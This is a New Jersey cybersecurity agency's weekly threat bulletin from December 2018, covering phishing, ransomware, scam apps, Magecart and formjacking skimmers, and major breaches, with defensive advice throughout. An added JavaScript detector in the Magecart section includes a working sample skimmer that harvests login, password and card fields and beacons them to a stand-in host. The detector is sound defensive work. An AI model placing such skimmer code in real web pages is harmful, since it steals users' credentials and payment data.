NJCCIC Weekly Bulletin | December 6, 2018

TLP: WHITE

Garden State Cyber Threat Highlight

Providing our members with a weekly insight into the threats and malicious activity directly targeting New Jersey networks.

QBot Banking Trojan Phishing Campaign

The NJCCIC has detected an active phishing campaign attempting to deliver the QBot banking trojan to New Jersey government accounts. The emails are crafted to look like replies to existing email threads and contain URLs leading to Visual Basic Script (VBScript) files; if a user runs the downloaded script, it installs QBot. Subject lines observed in this campaign reference a portal, an application, or tax information. QBot monitors the browsing activity of infected computers, captures information entered on financial websites, and is polymorphic, mutating its own code as it moves inside a network to evade signature-based detection. It can also download additional files and exfiltrate other sensitive information, including passwords, from an infected system. The NJCCIC recommends educating end users about this and similar phishing threats, reminding them never to click links or open attachments delivered in unexpected or unsolicited emails, even when the message appears to continue an earlier conversation. Users are advised to run an up-to-date anti-virus/anti-malware program on all devices and to enable multi-factor authentication wherever it is available, so that stolen credentials alone are not enough to compromise an account.

Announcement
 

DHS and FBI Publish Alert on SamSam Ransomware

The US Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) issued alert AA18-337A to inform network defenders about SamSam ransomware, also detected as MSIL/Samas.A. The alert covers infection vectors, including the vulnerabilities exploited, along with recommendations for mitigation and prevention, and provides technical details on four SamSam ransomware variants to further assist network defenders.

Threat Alerts
 

iOS Touch ID Used to Automatically Charge Users through Scam Fitness Apps

ESET security researcher Lukas Stefanko reported that two iOS fitness apps, “Fitness Balance” and “Calorie Tracker,” were abusing Apple’s Touch ID payment confirmation in an attempt to charge users without their consent. The apps displayed pop-ups prompting users to scan their fingerprint in order to unlock calorie trackers and diet recommendations; doing so instead authorized an in-app purchase, triggering a charge attempt of $99 to $139 against the payment card on the user’s Apple account. Users who had “Double Click to Pay” enabled were protected, because the purchase then requires a deliberate double press of the side button rather than a fingerprint alone. The apps also carried fake positive reviews in the App Store, making them appear more legitimate. Apple is aware of these scams and has removed the apps from the App Store. To protect yourself against automatic app charges, the NJCCIC recommends that iPhone X users enable the “Double Click to Pay” feature, and that all other iPhone users disable Touch ID for payments by going to Settings, then Touch ID & Passcode, and turning off “Use Touch ID for iTunes & App Store.” You can further protect yourself by reading an app’s negative reviews before installing it to judge its legitimacy, and by visiting our iOS malware threat profile for additional security recommendations. Victims of the scam can submit a report to Apple here.

Vision Direct Breach Expanded, Magecart Crawls for Admin Credentials

Image Source: RiskIQ
According to RiskIQ, Magecart Group 11 was responsible for a much larger breach of Vision Direct than initially estimated in November. The breach was thought to be confined to the company’s UK website, but it extended to the websites for Italy, Spain, Ireland, France, Belgium, and the Netherlands as well, all of which resolved to the same IP address. Furthermore, Group 11 is using a new tactic aimed at harvesting the credentials of website administrators: the skimmer filters form fields by keyword, capturing any field whose name contains “admin,” “account,” “login,” or “password.” This extends its reach beyond payment forms to login and administrative pages, so a compromised site can lose administrator credentials as well as customer card data, giving the attackers a way back in after the skimmer itself is removed. This new tactic indicates that Magecart poses an increased threat to e-commerce sites. The NJCCIC recommends that site owners avoid using third-party JavaScript when possible, rotate administrator credentials after any skimmer is found on a site, and refer to the Security Boulevard article for techniques to mitigate Magecart attacks.
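The keyword-filtering behavior described above can be turned into a detection heuristic for scripts found on a site. The following is an added example written for this bulletin, not code from the NJCCIC, RiskIQ, or Magecart: it scans collected page scripts and flags those that combine sensitive-field keywords, form reads, and an off-site exfiltration primitive. The exfiltration and form-access marker lists, the extra payment-field keywords, and the three sample scripts are assumptions constructed for illustration, not a published signature.

```javascript
// Added example, not code from the NJCCIC bulletin or from RiskIQ: a heuristic
// scanner that flags page scripts combining Magecart-style field keyword
// filtering with an off-site exfiltration primitive. The marker lists below
// are assumptions chosen for illustration, not a published detection rule.

// Keyword terms the bulletin attributes to the Group 11 filter, plus common
// payment-field names so checkout skimmers are caught too (assumed additions).
const FIELD_KEYWORDS = ['admin', 'account', 'login', 'password', 'card', 'cvv', 'expir'];

// Common ways skimmer code ships harvested values off-site (assumed list).
const EXFIL_MARKERS = [
  { label: 'image beacon', re: /new\s+Image\s*\(/ },
  { label: 'src to remote URL', re: /\.src\s*=\s*["'`]https?:/ },
  { label: 'fetch', re: /\bfetch\s*\(/ },
  { label: 'XMLHttpRequest', re: /XMLHttpRequest/ },
  { label: 'sendBeacon', re: /sendBeacon\s*\(/ },
  { label: 'base64 encode', re: /\bbtoa\s*\(/ },
];

// Evidence that the script reads user-entered form values.
const FORM_ACCESS = [
  /document\.forms/,
  /querySelector(All)?\s*\(\s*["'`](input|form|select)/,
  /\.value\b/,
  /new\s+FormData\s*\(/,
];

// Score one script. It is flagged only when all three signals appear:
// sensitive field keywords, a form read, and an exfiltration primitive.
function scanScript(name, source) {
  const lower = source.toLowerCase();
  const keywords = FIELD_KEYWORDS.filter((k) => lower.includes(k));
  const exfil = EXFIL_MARKERS.filter((m) => m.re.test(source)).map((m) => m.label);
  const readsForms = FORM_ACCESS.some((re) => re.test(source));
  const suspicious = keywords.length > 0 && readsForms && exfil.length > 0;
  return { name, keywords, exfil, readsForms, suspicious };
}

// Scan every script collected from a page and return only the flagged ones.
function flaggedScripts(scripts) {
  return scripts.map((s) => scanScript(s.name, s.source)).filter((r) => r.suspicious);
}

// Constructed sample scripts (not real skimmer code): a benign analytics
// call, a client-side password length check, and a keyword-filtering skimmer.
const SAMPLE_SCRIPTS = [
  { name: 'analytics', source: 'fetch("https://analytics.example/hit?p=" + location.pathname);' },
  { name: 'password-check', source: 'var pw = document.forms[0].password.value; if (pw.length < 12) { alert("Too short"); }' },
  { name: 'skimmer', source: 'var out = []; document.querySelectorAll("input").forEach(function (i) { var n = i.name.toLowerCase(); if (/admin|account|login|password|card/.test(n)) { out.push(n + "=" + i.value); } }); new Image().src = "https://cdn-static.example/i.gif?d=" + btoa(out.join("&"));' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(flaggedScripts(SAMPLE_SCRIPTS));
}
```

Requiring all three signals keeps a normal login-page validator (keyword plus form read, no exfiltration) and a plain analytics beacon (exfiltration, no field keywords) out of the results; only the script that both filters field names and sends them off-site is flagged. Obfuscated skimmers will defeat simple string matching, so this is a triage aid for reviewing scripts pulled from a site, not a substitute for the mitigations above.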

New Formjacking Campaign Targeting Top Retail Sites

Image Source: Symantec
Security researchers at Symantec have identified a new formjacking campaign targeting high-profile e-commerce sites. Within three months, Symantec blocked more than one million formjacking attempts against 10,000 websites, and at least 30 major websites and their regional sites were compromised. Formjacking is the theft of payment information from a checkout page by malicious JavaScript injected into that page. Formjacking campaigns typically compromise the supply chain by injecting the malicious code into a third-party provider’s library, so every site that loads the library is affected. In this case, however, Symantec observed a pattern in which legitimate sites in the US, Australia, Japan, and Germany redirected to a Paris-hosted site that contained the malicious formjacking code. That code also checked for the presence of debugging tools in order to evade analysis. Websites affected by formjacking continue to operate as usual, which makes these attacks difficult to identify. Groups like Magecart will continue to carry out these attacks, and they are very likely to increase. The NJCCIC highly recommends that site owners test all new updates in sandbox environments and monitor their systems for abnormal activity patterns. When integrating third-party scripts, use Subresource Integrity (SRI) attributes so that the browser refuses to execute a script whose hash does not match the value pinned in the tag. Note that SRI only applies to scripts with fixed content loaded from a fixed URL, and it does not help if the attacker can modify the page that contains the script tag itself. For more information on the campaign, review the Symantec blog post.

Breach Notifications
 
Marriott
Marriott announced a data security incident affecting up to approximately 500 million guests who made a reservation at a Starwood property during the last four years. According to the company’s notification, unauthorized actors have had access to the Starwood guest reservation database since 2014. Compromised information includes customer names and potentially their corresponding physical and email addresses. For approximately 327 million of the affected guests, passport numbers, Starwood Preferred Guest (SPG) account information, dates of birth, gender, reservation details, and communication preferences may also have been exposed. Marriott was alerted to the issue on September 8th of this year and began notifying affected customers via email on November 30th. The NJCCIC recommends that anyone who stayed at a Starwood property during the last four years closely monitor their accounts and report fraudulent activity as soon as possible. We also recommend enrolling in any free credit monitoring programs offered by Marriott.
Quora
Quora, a community question-and-answer website, suffered a data breach that exposed information on approximately 100 million users. Threat actors accessed account information such as names, email addresses, and encrypted passwords; public content such as questions, answers, and comments; and non-public content such as direct messages. Quora has engaged digital forensic and security experts to investigate and will notify all impacted users. The full security update can be found here.

Threat Profiles
 
Android: No new or updated variants were added.
Botnet: No new or updated botnets were added.
Cryptocurrency-Mining: One new variant: Kingminer.
Exploit Kit: No new or updated exploit kits were added.
Industrial Control Systems: No new or updated variants were added.
iOS: No new or updated variants were added.
macOS: No new or updated variants were added.
Point-of-Sale: No new or updated variants were added.
Ransomware: No new or updated variants were added.
Trojan: No new or updated variants were added.

ICS-CERT Advisories
 
Patch Alerts
 
Throwback Thursday
 
Threat Analysis
Be Sure to Secure

Social Engineering Awareness
Phishing Attempts Soar to 137 Million in Q3
Comment: A cybersecurity firm reported an increase of 30 million sextortion, spam, phishing, and cryptocurrency scam attempts over the previous quarter. The report noted a particular rise in sextortion spam, consistent with the increase in incident reports to the NJCCIC from New Jersey citizens who have received these and similar emails. Maintaining awareness of the tactics threat actors use, along with a healthy dose of skepticism, can greatly reduce victimization by phishing and other spam emails.

Cyber at a Glance
Hacker Hijacks Printers Worldwide to Promote Popular YouTube Channel
Comment: An anonymous Twitter user carried out a seemingly harmless prank in which he forced nearly 50,000 Internet-exposed printers around the world to print a flier in support of a YouTuber. However silly, the exploit had the potential for more serious damage. The open-source toolkit used, the Printer Exploitation Toolkit (PRET) published on GitHub, can also read files stored on a printer, capture print jobs, and cause physical damage to the device.
While this hack was not born of malice, it shows that many organizations still fail to secure their network printers, leaving them exposed to the Internet and accessible to unauthorized parties. You can secure your printers by changing default usernames and passwords, keeping firmware updated, requiring a login for administration, and disabling any unnecessary services that allow remote access, such as raw printing on TCP port 9100, IPP on port 631, and LPD on port 515. Printers should never be reachable directly from the Internet; keep them on an internal network segment and restrict which hosts can reach the printing ports.

Questions?

Email a Cyber Liaison Officer at njccic@cyber.nj.gov.
 
The Weekly Bulletin aggregates information about cyber threats, vulnerabilities, and other resources to promote shared awareness and the adoption of best practices. Designed for a general audience, the Bulletin aims to bridge the information sharing gaps between all levels of government, the private sector, and our citizens.
